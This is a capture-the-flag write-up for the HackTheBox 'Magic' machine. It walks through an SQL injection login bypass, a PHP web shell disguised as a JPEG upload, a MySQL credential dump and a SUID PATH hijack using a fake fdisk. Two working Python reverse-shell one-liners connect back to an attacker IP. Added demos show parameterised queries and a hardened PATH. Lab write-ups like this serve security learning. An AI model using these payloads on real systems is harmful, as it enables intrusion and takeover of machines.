HackTheBox Magic Writeup – 10.10.10.185
Hey guys, I'm back with another writeup. This time it is the Magic (10.10.10.185) Linux machine by TRX, released by HackTheBox on 18th April 2020. The machine is rated Medium difficulty and is worth 30 points.
A fairly simple and straightforward box, with a SQL injection login bypass for the initial foothold. The machine chains several weaknesses: bypassing the login page with SQLi, a file upload that can be tricked into accepting a PHP web shell (that is how I did it; others used different techniques), and database credentials left readable on disk that lead to the user's password in MySQL.
Let us begin.
As always, I add the machine IP to my hosts file as magic.htb and proceed with the Nmap scan.
Nmap Scan Results:
$ nmap -T4 -A -sV -sS magic.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 09:07 +03
Nmap scan report for magic.htb (10.10.10.185)
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/20%OT=22%CT=1%CU=44149%PV=Y%DS=2%DC=T%G=Y%TM=5E9D3C3
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   117.80 ms 10.10.14.1
2   117.82 ms magic.htb (10.10.10.185)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.38 seconds
The Nmap scan shows SSH on port 22 and an Apache web server on port 80. I proceed to inspect port 80.
There is an image portfolio website running on the Apache web server. I noticed a login page and tried admin:admin and a couple of other common credentials to see if anything works, but no luck.
After a couple of tries I used simple SQL injection payloads as the credentials and, to my surprise, it worked and I was logged in. The login form evidently builds its query straight from the submitted username and password, so a quote followed by an always-true condition (or a comment marker that cuts off the password check) is enough to make the query match a row without knowing any password.
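To make the bypass concrete, here is an added example (not the box's code, and not the author's payload) that runs the same login query two ways against a constructed in-memory SQLite table: once with string concatenation, which is what the vulnerable form does, and once parameterised. The table name, columns and the admin password are all made up for the demo; the real schema is only revealed later, when the database is dumped.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the portfolio site's login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO login (username, password) VALUES ('admin', 'correct-horse')"
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """String concatenation: the user input becomes part of the SQL grammar."""
    query = (
        "SELECT id FROM login WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Parameterised query: values travel separately from the statement, so
    quotes or comment markers in the input can never change its structure."""
    query = "SELECT id FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Two classic payload shapes. The first turns the WHERE clause into
# "... OR '1'='1", the second comments out the password comparison entirely.
PAYLOADS = [
    ("' OR '1'='1", "' OR '1'='1"),
    ("admin'-- ", "anything"),
]


def demo():
    """Return {(user, pass): (vulnerable_result, safe_result)} for each payload."""
    conn = make_db()
    return {
        (u, p): (vulnerable_login(conn, u, p), safe_login(conn, u, p))
        for u, p in PAYLOADS
    }


if __name__ == "__main__":
    for creds, (vuln, safe) in demo().items():
        print(f"{creds!r}: concatenated={vuln} parameterised={safe}")
```

Both payloads log in through the concatenated query and both fail through the parameterised one, while the real credentials still work for the latter; SQLite's `--` comment syntax behaves like MySQL's here, so the second payload carries over unchanged.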
Once logged in there is an upload button for images. Only the image formats JPG, JPEG and PNG are allowed.
Reverse Shelling Using PHP WebShell
I recall an old machine with a similar scenario where, at one point, I had to upload a PHP web shell to get access to the system, so I decided to do the same. When I think of PHP web shells, I think of WhiteWinterWolf's PHP web shell.
I downloaded the web shell, renamed it to nav1n.php.jpeg and added the JPEG magic bytes (FF D8 FF) at the beginning of the file so that it passes the upload form's image check. Then I uploaded the file.
After a successful upload my PHP web shell was ready. However, while I was preparing the reverse shell command I noticed my shell was gone: uploaded files are cleaned up after a minute or so, so the next steps have to be done quickly (or the upload repeated).
With the web shell in place and the reverse shell one-liner ready, I started my listener and executed the simple Python reverse shell through the web shell. And boom, I have a reverse shell in my listener as www-data.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
I started to enumerate the www/Magic folder and noticed a PHP file called "db.php5". I cat it and found credentials for the user theseus.
However, these credentials didn't work for switching to theseus with su, nor for SSH. There must be another way to escalate, so I kept enumerating.
Reading the code more carefully, I realised the credentials are not for a system user but for the MySQL database. So I proceeded to dump the database and read through the tables, hoping to find credentials stored there.
Dumping MySQL Database
Dumping a MySQL database is as easy as the command below. I have the DB credentials, so I tried it.
mysqldump -u [username] -p[password] [database_name] > [dump_file.sql]
I made a dumb mistake and kept getting "Access denied". I was certain the credentials I had were correct. After a few tries I realised the command I was using to dump the database was wrong: with mysqldump (and the mysql client) the password has to follow -p immediately, with no space in between. Written as "-p password", the tool prompts for a password interactively and treats "password" as the database name instead.
After fixing my command I got the database dump.
As I assumed, I found a new credential in the "login" table, stored for a user named admin.
Privilege Escalation As Theseus
When I tried to switch user to admin I still got access denied, but that password was reused by theseus, not by any system user called admin. I got logged in as theseus and grabbed user.txt immediately.
Privilege Escalation To Root
A quick SUID search revealed an unusual binary, sysinfo, that theseus is able to run.
I ran sysinfo and the output showed the VM's hardware information.
I somehow knew that sysinfo could help to get root, but honestly I'm very poor at that part. I DMed one of the early rooters in the forum asking for help. He told me that a custom-made fdisk with a reverse shell inside a temp directory will get you root when you run sysinfo.
I understood the process, but was still unsure how to make sysinfo run a custom-made fdisk from a temp directory. I started to Google for more help and finally made up my mind to gather everything and start.
What I did was create a file called "fdisk", open it in a text editor and add the following reverse shell code.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I set up my listener on port 9999.
I uploaded the file into a new directory I created inside /tmp. The trick only works because sysinfo invokes fdisk by its bare name and lets the shell find it through PATH, so that directory has to be at the front of PATH in the shell from which sysinfo is launched; otherwise the real fdisk runs and nothing happens.
I changed the permissions to make the file executable.
And finally I ran sysinfo. Since the binary is SUID root, my fdisk runs as root, and there it is: a reverse shell as root in my listener.
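The privilege escalation above is a PATH hijack, and it is worth seeing the mechanism in isolation. This is an added example, not the box's sysinfo binary: a small shell script stands in for sysinfo and calls `fdisk -l` by bare name (the assumption the technique rests on), a fake `fdisk` in an attacker-controlled directory writes a marker file instead of spawning a reverse shell, and a hardened variant of the stand-in shows why an absolute path and a pinned PATH defeat the trick. Nothing here runs as root; all file names and directories are constructed with tempfile.

```python
import os
import stat
import subprocess
import tempfile


def write_exec(path, body):
    """Write a small shell script and mark it executable."""
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IRUSR | stat.S_IXUSR)


def simulate_path_hijack():
    """Return which 'fdisk' a privileged program ends up running under three setups.

    Keys: 'default_env' (untouched PATH), 'path_lookup' (attacker dir first in
    PATH, program uses bare name) and 'absolute_path' (attacker dir first in
    PATH, program uses /sbin/fdisk and pins PATH). The value is the marker
    content written by the fake fdisk, or None if the fake never ran.
    """
    results = {}
    with tempfile.TemporaryDirectory() as root:
        marker = os.path.join(root, "marker")

        # Stand-in for sysinfo: calls fdisk by bare name, the weakness a PATH hijack needs.
        victim = os.path.join(root, "sysinfo")
        write_exec(victim, "#!/bin/sh\nfdisk -l >/dev/null 2>&1\n")

        # Hardened variant: pinned PATH and an absolute path, so the attacker's
        # directory is never searched. (A real SUID program would do the same
        # with setenv("PATH", ...) before execvp/popen.)
        fixed = os.path.join(root, "sysinfo_fixed")
        write_exec(
            fixed,
            "#!/bin/sh\nPATH=/usr/sbin:/usr/bin:/sbin:/bin\n/sbin/fdisk -l >/dev/null 2>&1\n",
        )

        # Attacker-controlled directory holding the fake fdisk (stands in for the
        # reverse-shell script from the writeup).
        hijack_dir = os.path.join(root, "hijack")
        os.mkdir(hijack_dir)
        write_exec(
            os.path.join(hijack_dir, "fdisk"),
            "#!/bin/sh\nprintf hijacked > '%s'\n" % marker,
        )

        def run(binary, env):
            if os.path.exists(marker):
                os.remove(marker)
            subprocess.run([binary], env=env, check=False)
            if not os.path.exists(marker):
                return None
            with open(marker) as fh:
                return fh.read()

        clean_env = dict(os.environ)
        hijacked_env = dict(
            os.environ,
            PATH=hijack_dir + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin"),
        )

        results["default_env"] = run(victim, clean_env)
        results["path_lookup"] = run(victim, hijacked_env)
        results["absolute_path"] = run(fixed, hijacked_env)
    return results


if __name__ == "__main__":
    for setup, outcome in simulate_path_hijack().items():
        print("%-14s -> %s" % (setup, outcome or "real fdisk (or nothing) ran"))
```

Only the middle case runs the fake binary. On the box, the same lookup happens inside a SUID-root process, which is why the planted script's reverse shell comes back as root; the fix on the program side is exactly what the hardened stand-in does, and on the system side it is not shipping SUID helpers that shell out by bare name at all.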
That’s all folks, this is how I root the Magic box. Thank you for dropping by and reading.